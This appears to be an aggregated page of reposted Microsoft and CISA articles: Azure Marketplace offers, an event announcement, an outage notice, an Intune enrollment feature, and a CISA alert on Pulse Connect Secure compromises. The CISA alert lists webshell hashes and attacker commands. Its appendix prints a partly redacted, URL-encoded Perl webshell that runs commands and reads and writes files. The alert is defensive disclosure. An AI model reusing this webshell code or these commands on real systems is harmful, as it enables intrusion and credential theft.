Azure Marketplace new offers – Volume 131

Azure Marketplace new offers – Volume 131

This article is contributed. See the original author and article here.











We continue to expand the Azure Marketplace ecosystem. For this volume, 54 new offers successfully met the onboarding criteria and went live. See details of the new offers below:





































































































































































































































Applications


additiv Wealth Solution Builder.png

additiv Wealth Solution Builder: additiv’s Wealth Solution Builder allows financial institutions to create client journeys and functionality on top of a predefined blueprint. Developers can create and control every element of the system without having to build the foundational elements.


Addreality.png

Addreality: Addreality is a customer engagement platform that uses computer vision and machine intelligence to deliver targeted advertising, real-time analytics, mood recognition, and customer journey analysis at points of sale.


AMHub.png

AMHub: Intended for midsized IT departments, AMHub helps manage the allocation of people to projects. Allocations can be managed per person or per project. Visualize allocations with filterable views and track employees’ allocation history.


ARM Template.png

ARM Template – Virtual Machine with Visual Studio: Quality Code’s template for Microsoft Azure Resource Manager facilitates the provisioning of virtual machines during application development with Visual Studio. You can deploy the template through Visual Studio code or through Azure PowerShell.


Banno Digital Platform.png

Banno Digital Platform: The Banno Digital Platform is an open-banking solution with an API-first model that promotes a unified user experience across features and applications. Give your users beautiful, lightning-fast native apps.


Azure vWAN using VMware SD-WAN.png

BUI Managed vWAN for Azure using VMware SD-WAN: This application from BUI creates a secure Microsoft Azure landing zone and implements a VMware SD-WAN controller in Azure. Expand your wide area network infrastructure to Azure using VMware SD-WAN.


Cognite Data Fusion.png

Cognite Data Fusion: Cognite Data Fusion is a DataOps and AI platform that makes industrial data accessible, understandable, and useful for data scientists and developers. It uses a broad range of Microsoft technologies and services to enable heavy-asset enterprises to make data-driven decisions.


Comarch OSS.png

Comarch OSS: Comarch’s operations support systems software lets communication service providers maintain all types of network domains and technologies and add new infrastructure as their business evolves. Comarch OSS can manage hybrid networks, virtualized infrastructure, and software-defined and self-organizing networks.


CONNECT.png

CONNECT: CONNECT is a powerful and adaptable platform for police and public safety. Its mobile functionality allows more officers to work beyond the police station and out in public, where they can do the most good.


Data Integration Platform.png Data Integration Platform: The Data Integration Platform from MobiLab Solutions empowers all employees, regardless of their technical skills, to work with data. Collaboration becomes easy because team members always see the latest work through analysis or visualizations.
ElitCustomer Insights Suite.png

ElitCustomer Insights Suite: ElitCustomer Insights Suite is an integrated solution developed by Elitmind based on Microsoft Dynamics 365 Customer Insights and Microsoft Azure. It connects data from transactional, behavioral, and observational sources to create a central interface for performing customer analytics.


FORCAM FORCE.png

FORCAM FORCE SAAS – The Smart Factory Cloud: Made for small and medium-sized manufacturing companies, FORCAM FORCE SAAS integrates real-time machine data to deliver standardized reports that provide full transparency into production. Connect more machines, add new shop-floor scenarios, and scale as needed. 


Gatling FrontLine.png

Gatling FrontLine – Load Testing: Gatling FrontLine is the enterprise version of the open-source solution Gatling, one of the leading load-testing tools, designed for DevOps and CI/CD. Gatling FrontLine helps you manage your load-testing strategy at the scale of your entire organization.


GridBuddy Cloud.png

GridBuddy Cloud for Microsoft Dynamics 365: GridBuddy Cloud makes it faster and more intuitive for users to update and navigate data in Microsoft Dynamics 365 by placing fields from multiple tables, and even multiple environments, into one editable grid-based workspace.


HID HydrantID.png

HID HydrantID Managed PKI-as-a-Service: Eliminate the operational complexity of organizational private PKI (public key infrastructure) with this solution from HID Global. HydrantID Managed PKI-as-a-Service enables organizations to create and deploy private PKI trust hierarchies to secure their networks, IT systems, and IoT devices.


IoT device management platform.png

IoT Device Management Platform by TTPSC: IoT Device Management Platform from Transition Technologies enables secure remote management of devices from a central location. Manage ATMs, respirators, and other devices with the turnkey solution, which is based on Microsoft Azure components.


LogiGuard.png

LogiGuard: Rapidly identify threats, learn about them, and prevent them with LogiGuard, an AI-enabled security platform powered by Microsoft Azure. LogiGuard provides a clear, centralized interface to view and manage the multiple functions of security across your technology environment.


Machine Learning Connect.png

Machine Learning Connect: Machine Learning Connect utilizes IoT data and customer data to help companies introduce AI analysis earlier in their processes. The solution can be used for energy management in factories, demand forecasting of products, and more. This app is available only in Japanese.


Migrator Plus.png

Migrator Plus: Adopteq Migrator Plus can quickly migrate your Domino applications to Microsoft Azure or Microsoft SharePoint. Select databases, forms, and fields, then map those to SharePoint sites, lists, and content types. Migrate with just a few clicks.


MishiPay.png

MishiPay: Scan, Pay, Go: MishiPay lets shoppers at brick-and-mortar stores scan items and pay for them with their mobile phones. This helps shoppers avoid long lines and allows businesses to more efficiently use floor space, boosting store profitability and customer satisfaction.


Mobile Threat Defense for Microsoft 365.png

Mobile Threat Defense for Microsoft 365: Lookout’s apps provide mobile security so businesses can protect their data from threats while respecting employees’ privacy. Lookout apps are designed to integrate with such products as Microsoft Endpoint Manager and Microsoft Azure Active Directory.


Modern Data Platform.png

Modern Data Platform: Using Microsoft Azure analytical services, the Modern Data Platform from Elitmind provides a unified analytics environment for performing data integration, data exploration, data warehousing, and machine learning tasks.


NPS Duties.png

NPS Duties: Version 5 of NPS Duty Management is a responsive, web-based portal for police and prison staff. Officers can automate the creation of schedules, avoid unplanned overtime, calculate accurate compensation, and add options for scheduling court appearances and training.


PowerTester.png

PowerTester: PowerTester from Wild Data Solutions is an automated testing solution for Microsoft Power BI. The low-code test automation tool compares what’s displayed in a report visualization with what’s returned from the backing SQL database using an SQL query provided by the user.


Real-Time performance monitoring solution.png

Real-time performance monitoring solution: LOGEPAL from Activeo is a comprehensive set of monitoring and analytics capabilities designed for contact centers and IT help desks. Users can display data from several tools or from any database through an intuitive and easy-to-use interface.


SaaS Alerts.png

SaaS Alerts: SaaS Alerts is a monitoring platform for managed service providers to protect against data theft, data at risk, and bad actors. Simplicity is key for SaaS Alerts: In most cases, IT service providers will be able to finish the onboarding process within minutes.


Sega Remote Operations DataCenter.png

Sega Remote Operations DataCenter: The Sega Remote Operations DataCenter uses Microsoft Azure and VMware Cloud Foundation to deploy your datacenter to the cloud. Private cloud environments are delivered via vSphere clusters built on a dedicated Azure infrastructure.


Senseye PdM.png

Senseye PdM – Predictive Maintenance on Azure: Reduce unplanned downtime and increase maintenance efficiency with Senseye PdM. Through advanced machine learning techniques, Senseye PdM is able to automate predictive maintenance across motors, compressors and pumps, robots, stamping machines, conveyors, and more.


Social Alert.png

Social Alert: Police, universities, domestic violence programs, private security companies, and others can use Social Alert to receive and manage emergency alerts related to security, fire, health, or accidents.


Truata Calibrate.png

Truata Calibrate: Truata Calibrate allows organizations to measure and quantify data privacy risks within their own environment. Features include automated and comprehensive risk scoring, direct and indirect personal identifiers, and data utility impact analysis for recommended mitigation actions.


WeManage eProcurement.png

WeManage eProcurement: Extend your procure-to-pay automation to unlimited employees and vendors with V-Work’s WeManage eProcurement, designed for Microsoft Dynamics 365 Business Central and Microsoft Dynamics NAV.



Consulting services


APN FortiGate solutions.png

APN FortiGate solutions in Azure: 5-Day Proof of Concept: APN Promise will deliver a proof of concept of Fortinet’s FortiGate solution on Microsoft Azure infrastructure. The pilot implementation is recommended for organizations that have Fortinet solutions running on their on-premises infrastructure.


AZ-104.png

AZ-104: Microsoft Azure Admin: 4-Day Workshop: This workshop from NetCom Learning will teach IT professionals how to manage Microsoft Azure subscriptions, create and scale virtual machines, implement storage solutions, configure virtual networking, and back up and share data.


Azure Architect day.png

Azure Architect Day: 1-Day Workshop: With the Architect Day workshop, Elisa Oyj will help clients clarify their ideas, learn how to maximize the potential of Microsoft Azure, and build an implementation to produce customer value. This workshop is available only in Finnish.


Azure Infra Cloud Migration.png

Azure Infra Cloud Migration: 10-Week Assessment: In this assessment, ACTS will examine your organization’s on-premises applications to determine a cost-effective and successful path to the cloud. ACTS can also perform the migration with a proven, repeatable, and agile process customized for your needs.


Azure Sentinel Utilization Service.png

Azure Sentinel Utilization Service: 8-Week Implementation: TIS Corporation’s range of utilization services for Microsoft Azure Sentinel can help customers strengthen security as well as introduce Azure Sentinel to customers considering it. This service is available only in Japanese.


Cloud4C Azure Managed Services.png

Cloud4C Managed Services for Azure – Database: Cloud4C Services offers complete database management for your Microsoft Azure environment. Let Cloud4C Services take care of modernization and security efforts, as well as proactive and preventive maintenance.


Cloud Adoption Framework Assessment.png

Cloud Adoption Framework Assessment: 5 Days: To start or accelerate your cloud journey, Inetum-Realdolmen will assess your organization’s infrastructure and assets for cloud readiness, and hold workshops with executives and business owners on cloud strategy.


Cloud Cost Optimization.png

Cloud Cost Optimization: 4-Hour Assessment: In this free assessment, celver AG will use an analysis template based on Microsoft Power BI to identify the main cost drivers of your Microsoft Azure usage, along with potential opportunities to save money. This offer is available only in German.


CloudMoyo IDS.png CloudMoyo Intelligent Data Services (IDS): With expertise in data engineering, decision analytics, and AI and machine learning solutions, CloudMoyo’s Intelligent Data Services staff can put you on a fast track to value. Migrate, build, and maintain modern data platforms with the support of CloudMoyo.
Cloud Strategy and Roadmap.png

Cloud Strategy and Roadmap (CAF): 3-Week Assessment: Following the Microsoft Cloud Adoption Framework for Azure, Invero will assess your business and technology estate, then deliver a customized strategy and roadmap to embark on. This offer includes a half-day workshop to understand your business goals and cloud needs.


Data Governance with Azure Purview.png

Data Governance with Azure Purview: 10-Day Proof of Concept: Adatis will highlight a subset of data governance issues that your business is facing and implement a pilot of Microsoft Azure Purview. You’ll then receive business and technical recommendations to progress your data governance initiative.


Data Science with Databricks.png

Data Science with Databricks: 3-Day Workshop: In this workshop from celver AG, you’ll learn about machine learning and Microsoft Azure Databricks, then develop a use case with celver AG’s assistance. This offer is available only in German.


Digital Drivers for Mobility.png

Digital Drivers for Mobility: 4-Hour Briefing: This briefing and consultation from Valtech Solutions will help your team understand the business transformation opportunities and advantages of using Microsoft Azure for your mobility service and connected vehicle service projects.


IBM Power.png

IBM Power – Azure Migration: 5-Day Assessment: IBM Power workloads (IBM i and AIX) require special consideration before migrating to the cloud. Meridian’s IBM Power Workload Requirements Analysis will give clients insight into their infrastructure’s readiness for cloud adoption.


Implementation- Data modernization in a month.png

Implementation: Data modernization in a month: Using a library of preconfigured templates, tools, and resources, Neal Analytics will deliver a fully functional database using Microsoft Azure. With Neal Analytics, you’ll be able to spin up and seize the benefits of a modern database on Azure in 30 days or less.


Industry 4.0 IoT.png

Industry 4.0 IoT: 4-Week Custom Proof of Concept Development: Implement IoT for smart manufacturing, asset tracking, or predictive maintenance with the help of IOP Technologies. IOP Technologies will host a workshop to understand your business requirements, then use Microsoft Azure services to deliver a proof of concept for a custom IoT solution.


Intelequia Azure Managed Services.png

Intelequia Azure Managed Services: In this plan for current Intelequia customers, Intelequia will manage Microsoft Azure services and provide Microsoft-certified engineers. In addition to ongoing support, Intelequia will provide assessments to optimize costs, improve security, and increase infrastructure availability.


Kickstarter Horizon Cloud.png

Kickstarter Horizon Cloud on Azure: 5-Day Proof of Concept: In this proof of concept from Login Consultants, you’ll be able to quickly evaluate VMware Horizon Cloud on Microsoft Azure and ensure that end users have a great experience with virtual desktop environments or published applications.


Managed Cloud Virtual Desktop.png

Managed Cloud Virtual Desktop: 4-Day Proof of Concept: Inetum-Realdolmen will deliver a proof of concept of Windows Virtual Desktop for 15 users, one line-of-business application, and the Microsoft Office suite. After four days, Inetum-Realdolmen will hold a workshop to openly evaluate the engagement.


Managed Services in Cloud.png

Managed Services in Cloud Management & Security: ZiAAS will help you choose the right Microsoft Azure components for your business, employ strategies to integrate them, and support your team. ZiAAS’ managed services for Azure cater to organizations looking to utilize the cloud for the first time or looking for continuous management.


Migration to Azure Cloud.png

Migration to Azure Cloud: 8-Week Assessment: VisioThoughts will assess your organization’s applications and datacenter environment to help you achieve your cloud and AI adoption goals. VisioThoughts will provide a migration plan and offer the services of its dedicated delivery team.


Move to Microsoft Azure.png

Move to Microsoft Azure: 14-Day Cloud Assessment: This free assessment from Inspari will give you a clear understanding of your customer’s infrastructure and whether it’s cloud-ready. The service will use best-practice methodologies for assessment, planning, design, and more.


Safe Buildings.png

Safe Buildings: 10-Week Implementation: In this engagement, Cognizant will implement its Safe Buildings solution, which uses Microsoft Azure IoT Edge modules, Azure IoT Hub, Azure Event Hubs, and Azure Functions to help businesses reopen and manage COVID-19 risks.



Microsoft State and Local Government Collaboration and Cybersecurity Summit

Microsoft State and Local Government Collaboration and Cybersecurity Summit

This article is contributed. See the original author and article here.

register.jfif


 


Microsoft is committed to helping public sector leaders through their intergovernmental agency data sharing, cybersecurity, and collaboration initiatives. Register here for our Microsoft State and Local Government Collaboration and Cybersecurity Summit on April 27thThis free virtual event will deliver key insights, practical guidance, and direct conversations with public sector leaders and Microsoft stakeholders. Join us to learn more about:



  • Advancing cybersecurity in State and Local Government.

  • Cultural transformations that drive new ways of working and digital modernization.

  • Connecting with people and information from the office or in the field to securely share and protect sensitive information in today’s modern environment.


Our virtual event provides sessions tailored specifically for state and local organizations, as well as live interactive conversations with industry peers and Microsoft experts to address real world issues. Also gain access to content presented during the Federal and Civilian agency sessions delivered on April 20, 2021.


Learn from others. Share common strategies. Register today at https://aka.ms/MicrosoftinGov.

Experiencing Data Access Issue in Azure portal for Log Analytics – 04/20 – Investigating

This article is contributed. See the original author and article here.

Initial Update: Tuesday, 20 April 2021 15:19 UTC

We are aware of issues within Log Analytics and are actively investigating. Some customers may experience data access issue and delayed or missed Log Search Alerts in West Europe region.
  • Work Around: None
  • Next Update: Before 04/20 19:30 UTC
We are working hard to resolve this issue and apologize for any inconvenience.
-Soumyajeet

Exploitation of Pulse Connect Secure Vulnerabilities

This article is contributed. See the original author and article here.

Summary

The Cybersecurity and Infrastructure Security Agency (CISA) is aware of compromises affecting U.S. government agencies, critical infrastructure entities, and other private sector organizations by a cyber threat actor—or actors—beginning in June 2020 or earlier related vulnerabilities in certain Ivanti Pulse Connect Secure products. Since March 31, 2021, CISA assisted multiple entities whose vulnerable Pulse Connect Secure products have been exploited by a cyber threat actor. These entities confirmed the malicious activity after running the Ivanti Integrity Checker Tool. To gain initial access, the threat actor is leveraging multiple vulnerabilities, including CVE-2019-11510, CVE-2020-8260, CVE-2020-8243, and the newly disclosed CVE-2021-22893. The threat actor is using this access to place webshells on the Pulse Connect Secure appliance for further access and persistence. The known webshells allow for a variety of functions, including authentication bypass, multi-factor authentication bypass, password logging, and persistence through patching.

Ivanti has provided a mitigation and is developing a patch. CISA strongly encourages organizations using Ivanti Pulse Connect Secure appliances to immediately run the Ivanti Integrity Checker Tool, update to the latest software version, and investigate for malicious activity.

Technical Details

On March 31, 2021, Ivanti released an Integrity Checker Tool to detect the integrity of Pulse Connect Secure appliances. Their technical bulletin states:

We are aware of reports that a limited number of customers have identified unusual activity on their Pulse Connect Secure (PCS) appliances. The investigation to date shows ongoing attempts to exploit vulnerabilities outlined in two security advisories that were patched in 2019 and 2020 to address previously known issues: Security Advisory SA44101 (CVE-2019-11510) and Security Advisory SA44601 (CVE- 2020- 8260). For more information visit KB44764 (Customer FAQ).

The suspected cyber threat actor modified several legitimate Pulse Secure files on the impacted Pulse Connect Secure appliances. The modifications implemented a variety of webshell functionality:

  • DSUpgrade.pm MD5: 4d5b410e1756072a701dfd3722951907
    • Runs arbitrary commands passed to it
    • Copies malicious code into Licenseserverproto.cgi
  • Licenseserverproto.cgi MD5: 9b526db005ee8075912ca6572d69a5d6
    • Copies malicious logic to the new files during the patching process, allowing for persistence
  • Secid_canceltoken.cgi MD5: f2beca612db26d771fe6ed7a87f48a5a
    • Runs arbitrary commands passed via HTTP requests
  • compcheckresult.cgi MD5: ca0175d86049fa7c796ea06b413857a3
    • Publicly-facing page to send arbitrary commands with ID argument
  • Login.cgi MD5: 56e2a1566c7989612320f4ef1669e7d5
    • Allows for credential harvesting of authenticated users
  • Healthcheck.cgi MD5: 8c291ad2d50f3845788bc11b2f603b4a
    • Runs arbitrary commands passed via HTTP requests

Other files were found with additional functionality:

  • libdsplibs.so MD5: 416488b6c8a9bdb9c0cb592e36f44677
    • Trojanized shared object to bypass multi-factor authentication via a hard-coded backdoor key.

Many of the threat actor’s early actions are logged in the Unauthenticated Requests Log as seen in the following format, URIs have been redacted to minimize access to webshells that may still be active:

Unauthenticated request url /dana-na/[redacted URI]?id=cat%20/home/webserver/htdocs/dana-na/[redacted URI] came from IP XX.XX.XX.XX.

The threat actor then ran the commands listed in table 1 via the webshell.

Table 1: Commands run via webshell

Time Command
2021-01-19T07:46:05.000+0000 pwd
2021-01-19T07:46:24.000+0000 cat%20/home/webserver/htdocs/dana-na/[redacted]
2021-01-19T08:10:13.000+0000 cat%20/home/webserver/htdocs/dana-na/l[redacted]
2021-01-19T08:14:18.000+0000 See Appendix.
2021-01-19T08:15:11.000+0000 cat%20/home/webserver/htdocs/dana-na/[redacted]
2021-01-19T08:15:49.000+0000 cat%20/home/webserver/htdocs/dana-na/[redacted]
2021-01-19T09:03:05.000+0000 cat%20/home/webserver/htdocs/dana-na/[redacted]
2021-01-19T09:04:47.000+0000 $mount
2021-01-19T09:05:13.000+0000 /bin/mount%20-o%20remount,rw%20/dev/root%20/
2021-01-19T09:07:10.000+0000 $mount

The cyber threat actor is using exploited devices located on residential IP space—including publicly facing Network Attached Storage (NAS) devices and small home business routers from multiple vendors—to proxy their connection to interact with the webshells they placed on these devices. These devices, which the threat actor is using to proxy the connection, correlate with the country of the victim and allow the actor activity to blend in with normal telework user activity.

Details about lateral movement and post-exploitation are still unknown at this time. CISA will update this alert as this information becomes available.

Mitigations

CISA strongly urges organizations using Pulse Secure devices to immediately:

If the Integrity Checker Tools finds mismatched or unauthorized files, CISA urges organizations to:

  • Contact CISA to report your findings (see Contact Information section below).
  • Contact Ivanti Pulse Secure for assistance in capturing forensic information.
  • Review “Unauthenticated Web Requests” log for evidence of exploitation, if enabled.
  • Change all passwords associated with accounts passing through the Pulse Secure environment (including user accounts, service accounts, administrative accounts and any accounts that could be modified by any account described above, all of these accounts should be assumed to be compromised). Note: Unless an exhaustive password reset occurs, factory resetting a Pulse Connect Secure appliance (see Step 3 below) will only remove malicious code from the device, and may not remove the threat actor from the environment. The threat actor may use the credentials harvested to regain access even after the appliance is fully patched.
  • Review logs for any unauthorized authentications originating from the Pulse Connect Secure appliance IP address or the DHCP lease range of the Pulse Connect Secure appliance’s VPN lease pool.
  • Look for unauthorized applications and scheduled tasks in their environment.
  • Ensure no new administrators were created or non-privileged users were added to privileged groups.
  • Remove any remote access programs not approved by the organization.
  • Carefully inspect scheduled tasks for scripts or executables that may allow a threat actor to connect to an environment.

In addition to the recommendations above, organizations that find evidence of malicious, suspicious, or anomalous activity or files, should consider the guidance in KB44764 – Customer FAQ: PCS Security Integrity Tool Enhancements, which includes:

After preservation, you can remediate your Pulse Connect Secure appliance by: 

  1. Disabling the external-facing interface.  
  2. Saving the system and user config.
  3. Performing a factory reset via the Serial Console. Note: For more information refer to KB22964 (How to reset a PCS device to the factory default setting via the serial console)
  4. Updating the appliance to the newest version.
  5. Re-importing the saved config.   
  6. Re-enabling the external interface. 

CISA recommends performing checks to ensure any infection is remediated, even if the workstation or host has been reimaged. These checks should include running the Ivanti Integrity Checker Tool again after remediation has been taken place.

Contact Information

CISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at

  • 1-888-282-0870 (From outside the United States: +1-703-235-8832)
  • central@cisa.dhs.gov (UNCLASS)
  • us-cert@dhs.sgov.gov (SIPRNET)
  • us-cert@dhs.ic.gov (JWICS)

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on the CISA/US-CERT homepage at http://www.us-cert.cisa.gov/.

Appendix: Large sed Command Found In Unauthenticated Logs

Unauthenticated request url /dana-na/[redacted]?id=sed%20-i%20%22/main();/cuse%20MIME::Base64;use%20Crypt::RC4;my%20[redacted];sub%20r{my%20$n=$_[0];my%20$rs;for%20(my%20$i=0;$i%3C$n;$i++){my%20$n1=int(rand(256));$rs.=chr($n1);}return%20$rs;}sub%20a{my%20$st=$_[0];my%20$k=r([redacted]);my%20$en%20=%20RC4(%20$k.$ph,%20$st);return%20encode_base64($k.$en);}sub%20b{my%20$s=%20decode_base64($_[0]);%20my%20$l=length($s);my%20$k=%20substr($s,0,[redacted]);my%20$en=substr($s,[redacted],$l-[redacted]);my%20$de%20=%20RC4(%20$k.$ph,%20$en%20);return%20$de;}sub%20c{my%20$fi=CGI::param(%27img%27);my%20$FN=b($fi);my%20$fd;print%20%22Content-type:%20application/x-downloadn%22;open(*FILE,%20%22%3C$FN%22%20);while(%3CFILE%3E){$fd=$fd.$_;}close(*FILE);print%20%22Content-Disposition:%20attachment;%20filename=tmpnn%22;print%20a($fd);}sub%20d{print%20%22Cache-Control:%20no-cachen%22;print%20%22Content-type:%20text/htmlnn%22;my%20$fi%20=%20CGI::param(%27cert%27);$fi=b($fi);my%20$pa=CGI::param(%27md5%27);$pa=b($pa);open%20(*outfile,%20%22%3E$pa%22);print%20outfile%20$fi;close%20(*outfile);}sub%20e{print%20%22Cache-Control:%20no-cachen%22;print%20%22Content-type:%20image/gifnn%22;my%20$na=CGI::param(%27name%27);$na=b($na);my%20$rt;if%20(!$na%20or%20$na%20eq%20%22cd%22)%20{$rt=%22Error%20404%22;}else%20{my%20$ot=%22/tmp/1%22;system(%22$na%20%3E/tmp/1%202%3E&1%22);open(*cmd_result,%22%3C$ot%22);while(%3Ccmd_result%3E){$rt=$rt.$_;}close(*cmd_result);unlink%20$ot}%20%20print%20a($rt);}sub%20f{if(CGI::param(%27cert%27)){d();}elsif(CGI::param(%27img%27)%20and%20CGI::param(%27name%27)){c();}elsif(CGI::param(%27name%27)%20and%20CGI::param(%27img%27)%20eq%20%22%22){e();}else{%20%20%20&main();}}if%20($ENV{%27REQUEST_METHOD%27}%20eq%20%22POST%22){%20%20f();}else{&main();%20}%22%20/home/webserver/htdocs/dana-na/[redacted] came from IP XX.XX.XX.XX

References

Revisions

Initial version: April 20, 2021

This product is provided subject to this Notification and this Privacy & Use policy.

Setup Assistant with Modern Auth for ADE (iOS/iPadOS 13+ and macOS 10.15+) – Intune Public preview

Setup Assistant with Modern Auth for ADE (iOS/iPadOS 13+ and macOS 10.15+) – Intune Public preview

This article is contributed. See the original author and article here.

We’re excited to announce support for a new authentication method for Automated Device Enrollment (ADE) which is Setup Assistant with Modern Authentication. This new authentication method will be available for iOS/iPadOS devices running 13.0 and later and for macOS devices running 10.15 and later, in public preview in Microsoft Endpoint Manager.


 


Overview


This new authentication method for automated device enrollment will allow your organization to require authentication with Azure AD (required) and multi-factor authentication (optional) in order to successfully enroll the device. The end user will be required to authenticate with their Azure AD credentials during Setup Assistant, with an additional Azure AD login to the Company Portal after enrollment. If the admin has a Conditional Access policy that requires multi-factor authentication (at enrollment only, or enrollment and Company Portal login) then MFA will be required, otherwise it is optional. This will benefit organizations that are looking to require authentication in the out-of-box experience (OOBE) during enrollment in the Setup Assistant screens prior to users accessing the home screen.


 


Enrollment is completed once the user lands on the home screen, and users can freely use the device for resources not protected by Conditional Access. User affinity is established when users complete the additional Azure AD login into the Company Portal app on the device. That additional Azure AD login to the Company Portal app completes Azure AD registration, which establishes user affinity between the device user and Intune. Once user device affinity is established, the device will show up in the given user’s device list in the Azure AD portal since device identity association is established upon a successful login into the Company Portal.


 


When creating an Automated Device Enrollment profile, you’ll be able to choose a new authentication method: Setup Assistant with modern authentication (preview). This method provides all the security from authenticating with the Company Portal but avoids the issue of leaving end users stuck on a device they can’t use while the Company Portal installs on the device. With this new authentication method, the user has to authenticate using Azure AD credentials during the setup assistant screens. This will require an additional Azure AD login post-enrollment in in the Company Portal app to gain access to corporate resources protected by Conditional Access. The correct Company Portal version will automatically be sent down as a required app to the device for iOS/iPadOS, which we recommend choosing a VPP token for the enrollment profile. Otherwise, it will be sent down if the end user completes setting up their Apple ID during the Setup Assistant screens. For macOS, here are the options to get the Company Portal on the device – Add the Company Portal for macOS app – Microsoft Intune | Microsoft Docs.


 


If the admin configures a Conditional Access policy to require multi-factor authentication (MFA), then the end user will need a second device to complete MFA. Multi-factor authentication is optional based on the configuration of the MFA Azure AD settings.


 


Company Portal Redirection


A new improvement we’ve made to our onboarding experience helps guide end users to complete that second Azure AD authentication by automatically redirecting to the iOS/iPadOS Company Portal when the user attempts to access corporate data.



If users open any managed iOS/iPadOS applications that are protected by Conditional Access and they haven’t completed the additional Azure AD login into the iOS/iPadOS Company Portal, they will be redirected to the iOS/iPadOS Company Portal from those other apps as part of this new change. This way, users will know exactly where to go to get access to resources protected by Conditional Access and will be guided to complete that last step.



Here is what it will look like if the end user tries to open any app protected by Conditional Access before authenticating in the Company Portal –


 


Conditional Access block screenConditional Access block screen


 


System prompt that opens the iOS/iPadOS Company PortalSystem prompt that opens the iOS/iPadOS Company Portal


 


Configuration in Microsoft Endpoint Manager admin center


Learn how to configure the new Setup Assistant with Modern Authentication for iOS/iPadOS and macOS in the Microsoft Endpoint Manager admin center by reading Enroll iOS/iPadOS devices by using ADE – Microsoft Intune | Microsoft Docs and Enroll macOS devices – Apple Business Manager or Apple School Manager | Microsoft Docs. Within the MEM admin center, you can control where a user is prompted for multi-factor authentication using different cloud apps when creating a Conditional Access policy. The following screenshot provides an example of the prompt locations:


 


MFA Prompt Locations for Microsoft Intune and Microsoft Intune EnrolmentMFA Prompt Locations for Microsoft Intune and Microsoft Intune Enrolment


 


Using the enrolled device as user-less (device without user device affinity)


For both iOS/iPadOS and macOS, user device affinity is established with the additional Azure AD login to the Company Portal app as mentioned above. That is also when device compliance is assessed, and the device shows up as compliant in the Microsoft Endpoint Manager admin center. If you would like to keep the device as enrolled with Intune but without user device affinity, that is also supported.


 


Once enrollment is completed during Setup Assistant, the end user lands on the home screen and can freely use the device. If there are no resources protected by Conditional Access and if Azure AD registration is not required, then this authentication method can be used to fully enroll the device as a user-less device. Note the following device behavior if you choose this automated device enrollment flow without guiding end users to login to the Company Portal post enrollment:



  • The device will not show up in a given user’s device list in the Azure AD portal/admin center (since there is no device identity association).

  • The device will not show up as compliant in the Microsoft Endpoint Manager admin center.


 


Keep in my mind



  • If you choose “Setup assistant with Modern Authentication” as the authentication method when creating a profile for a device not running the correct software version, users will fall back to the legacy setup assistant Automated Device Enrollment flow.

  • For iOS/iPadOS, we recommend selecting to install the Company Portal app from a VPP token in the enrollment profile. When VPP is used, the application can be downloaded and installed without user interaction. When VPP isn’t used, an Apple ID is required to install the application. If the user doesn’t log into an Apple ID during Setup Assistant they will be prompted to log in when Intune attempts to install the Company Portal.



 


Let us know if you have any questions by commenting on this post or reaching out to @IntuneSuppTeam on Twitter.